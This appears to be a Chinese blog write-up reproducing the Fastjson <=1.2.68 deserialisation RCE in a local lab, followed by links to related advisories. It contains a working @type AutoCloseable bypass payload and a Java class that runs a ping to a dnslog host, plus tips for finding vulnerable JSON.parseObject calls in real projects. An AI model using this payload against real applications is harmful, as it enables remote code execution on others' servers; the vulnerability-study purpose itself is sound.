fastjson <=1.2.68 远程代码执行漏洞 学习

已于 2022-06-08 14:12:54 修改
阅读量814 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 学习 java json
于 2022-06-08 13:59:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/user_hs/article/details/125182603
版权
本文详细介绍了Fastjson 1.2.68及之前版本的远程代码执行漏洞,通过创建特定的Java类并利用`AutoCloseable`接口,展示了如何触发漏洞执行任意命令。在Spring MVC项目中,演示了如何引入Fastjson并利用该漏洞。同时,给出了实际项目中查找此类漏洞的方法,提醒开发者关注Fastjson的安全更新。
摘要由CSDN通过智能技术生成

fastjson <=1.2.68 远程代码执行漏洞 学习

环境

1、 MAC
2、Java版本为 1.8.0_261 。
3、Mysql版本为 5.7 。我用的是PHPstudy集成的。
4、IDEA版本随意。

项目

创建一个spring 项目mavc
在这里插入图片描述

pom.xml引用fastjson

<dependency>
  <groupId>com.alibaba</groupId>
  <artifactId>fastjson</artifactId>
  <version>1.2.58</version>
</dependency>

创建demo_fastjson.java

package com.xq.tmall;

import com.alibaba.fastjson.JSON;

public class demo_fastjson {
    public static class User{
        private String id;
        User(){
            System.out.println("User go");
        }
        public void setId(String ids){
            System.out.println("setId go");
            this.id=ids;
        }
        public String getId(){
            System.out.println("GetId go");
            return this.id;
        }
    }

    public static void main(String[] args){

        //案例1
        //了解type 调用方式
        User a = new User();
        String json = JSON.toJSONString(a);
        System.out.println(json);
        //获取序列化的路径执行
        System.out.println(JSON.parseObject(json,User.class));
        System.out.println("-----------------");
        //type 传入恶意的json ,就会被反序列化执行
        System.out.println(JSON.parseObject("{\"@type\":\"com.xq.tmall.demo_fastjson$User\",\"id\":\"123\"}"));
    }
}

输出
通过

漏洞利用

前面已经说到如何去利用,所以这里需要寻找一个子类或实现非常多的类或接口都行,在实际中还是主要看checkAutoType方法中,有哪些对象或接口可以通过校验,实际测试中存在如下几种:

白名单(符合白名单条件的类)
TypeUtils.mappings (符合缓存映射中获取的类)
typeMapping (ParserConfig中本身带有的集合)
deserializers (符合反序列化器的类)
测试中发现实际上 TypeUtils.mappings 中含有相当多的类,其中就包括了接口 java.lang.AutoCloseable

创建一个VulAutoClos.java

package com.xq.tmall;

import java.io.IOException;


//需要继承 AutoCloseable
public class VulAutoClos implements AutoCloseable {
    public VulAutoClos(){
        try {
            Runtime.getRuntime().exec("ping 22.tzw9oj.dnslog.cn");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void close() throws Exception {

    }
}

在main函数调用JSON.parseObject

//案例2:
        //通过AutoCloseable 调用指定类
        System.out.println(JSON.parseObject("{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"com.xq.tmall.VulAutoClos\",\"cmd\":\"calc\"}\n"));

在这里插入图片描述
现在直接允许,就成功调用了VulAutoClos 类,ping命令dnslog 成功,收到
在这里插入图片描述

某项目案例

pom 使用了fastjon
在这里插入图片描述
全局搜索文件【JSON.parseObject(】,查看是有有使用并参数可控
在这里插入图片描述

android fastjson漏洞_Fastjson <=1.2.68 远程代码执行漏洞
weixin_29300931的博客
12-28 519
漏洞名称:Fastjson <=1.2.68 远程代码执行漏洞威胁等级:高危影响范围:Fastjson<=1.2.68漏洞类型:代码执行 漏洞分析 1 Fastjson组件介绍Fastjson是一个Java语言编写的高性能功能完善的JSON库。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fas...
最新版 fastjson-1.2.68.jar
04-16
最新版 fastjson-1.2.68.jar
fastjson 1.2.68 反序列化远程代码执行漏洞
热门推荐
煜铭2011
06-01 1万+
0x00背景 fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止漏洞攻击。 0x01影响范围 fastjson < 1.2.69 fastjson sec 版本 < sec10 0x02漏洞修复 1、升级至安全...
Canal 解决fastjson = 1.2.68 反序列化远程代码执行漏洞
weixin_42763067的博客
08-20 1465
1.下载源码https://github.com/alibaba/canal 2.修改fastjson 的安全版本(我升级了1.2.7版本) 3.编译构建(mvn -B clean package -Dmaven.test.skip=true -Dautoconfig.skip) 4.替换对应的canal相关jar包 5.启动服务,收工! 踩坑记录: 服务启动报错,数据无法同步 java.io.IOException: Received error packet: errno = 1236.
[转载] --- Fastjson1.2.68版及以下全版本远程代码执行漏洞通告
zhangsir的博客
06-29 8793
【安全通告】Fastjson <=1.2.68全版本远程代码执行漏洞通告 尊敬的腾讯云用户,您好!近日,腾讯云安全运营中心监测到,Fastjson <=1.2.68版本存在远程代码执行漏洞漏洞被利用可直接获取服务器权限。为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,...
探秘Fastjson安全漏洞fastjson-bypass-autotype-1.2.68
最新发布
gitblog_00025的博客
05-30 355
探秘Fastjson安全漏洞fastjson-bypass-autotype-1.2.68 去发现同类优质开源项目:https://gitcode.com/ 在Java世界里,Fastjson是一个广泛使用的JSON库,以其高效和便捷性赢得了开发者们的喜爱。然而,随着技术的发展,安全问题日益凸显。本文将为您揭示一个关于Fastjson的安全隐患——通过AutoCloseable和Throwabl...
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
**Fastjson 1.2.69 反序列化远程代码执行漏洞详解** Fastjson 是阿里巴巴开源的一个高性能的 JSON 库,广泛应用于 Java 开发中,用于 JSON 的序列化和反序列化操作。然而,Fastjson 1.2.69 版本存在一个严重的反序...
fastjson <= 1.2.80 反序列化任意代码执行漏洞
09-02
- *1* [fastjson1.2.8 反序列化远程代码执行漏洞](https://download.csdn.net/download/xiazai_ceshi/18466350)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
fastjson远程代码执行漏洞
网安君的博客
03-29 5749
Fastjson 1.2.24 远程代码执行漏洞 漏洞说明 FastJson库是Java的一个Json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象。在2017年3月15日,fastjson官方主动爆出fastjson1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 前提条件 开启autotype 影响范围 fastjson 1.2.22-1.2.24 jdk 1.7,1.8版本 漏洞复现 由于Fastj
fastjson< 1.2.69远程代码执行漏洞cve编号
01-04
fastjson< 1.2.69远程代码执行漏洞的CVE编号是CVE-2021-21351。该漏洞源于fastjson在处理JSON数据时存在安全漏洞,攻击者可以通过精心构造的JSON数据来实现远程代码执行,从而对系统进行攻击。 漏洞的产生主要是...
fastjson 1.2.47 远程命令执行漏洞
weixin_42786460的博客
10-14 590
fastjson 1.2.47 远程命令执行漏洞
Java代码审计——fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件
王嘟嘟的博客
03-31 5031
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 这一篇应该是最后一个网上能找到的poc分析了。 0x01 环境 参考 https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg
Java代码审计——fastjson 1.2.68 反序列化漏洞 SafeFileOutputStream文件操作
王嘟嘟的博客
03-23 3336
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 0x01 环境 maven文件: <dependency> <groupId>org.aspectj</groupId> <artifactId>aspectjtools</artifactId> <version>1
Java代码审计——fastjson 1.2.68 反序列化漏洞 Exception
王嘟嘟的博客
03-14 9495
0x00 前言 反序列化总纲 继1.2.58绕过autotype之后,1.2.68又出现了新的绕过方式,通过Exception来进行绕过,但是此方法要求比较苛刻 0x01 环境搭建 首先来说版本,经过测试发现使用Exception的方法最低生效版本为1.2.40。所以maven调整到1.2.40即可。 这里我们需要假设有一个继承了Exception的类。 public class test extends Exception { private String domain; public
fastjson1.2.68对于文件操作的分析最全
2301_79724395的博客
05-15 1185
这次分析也是分析了很久,因为每个链子都是自己去跟着分析了的,然后主要是去学习了一下怎么去挖链子。
Java代码审计——fastjson 1.2.68 反序列化漏洞 FileOutputStream写文件
王嘟嘟的博客
03-25 7643
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 看了这个poc之后,就一直纠结,为啥只有openjdk >= 11才可以用,最后在调试+看了大部分文章之后才终于明白 0x01 环境 这里需要准备两个jdk,一个 1.8 一个11 0x02 环境约束 首先先来看一下Fastjson的构造参数选择: 通过createJavaBeanDeserializer进来 走到JavaBeanInfo.build 这里判断如果不
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
Java代码审计——fastjson 1.2.68 反序列化漏洞 Mysql RCE
王嘟嘟的博客
03-21 5979
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 0x01 环境 首先是版本问题: fastjson 1.2.39-1.2.68 mysql 5.1.11- 8.x 默认Gadget maven <dependency> <groupId>mysql</groupId> <artifactId>mysql-con
fastjson反序列化漏洞_fastjson 反序列化远程代码执行漏洞 紧急通告
weixin_39862484的博客
11-30 444
点击蓝字关注我们漏洞信息漏洞名称:fastjson 反序列化远程代码执行漏洞发布日期:2020.06.03威胁类型:远程代码执行危险等级:高危受影响的版本:fastjson <=1.2.68fastjson sec 版本 <= sec9android 版本不受此漏洞影响漏洞描述fastjson 采用黑白名单的方法来防御反序列化漏洞,导致当攻击者不断发掘新的反序列化 Ga...
Java代码审计——fastjson 1.2.68 反序列化漏洞 文件写入
王嘟嘟的博客
03-24 3601
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 还有就是Java代码审计——fastjson 1.2.68 反序列化漏洞 SafeFileOutputStream文件操作 0x01 环境 maven <dependency> <groupId>com.esotericsoftware</groupId> <artifa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值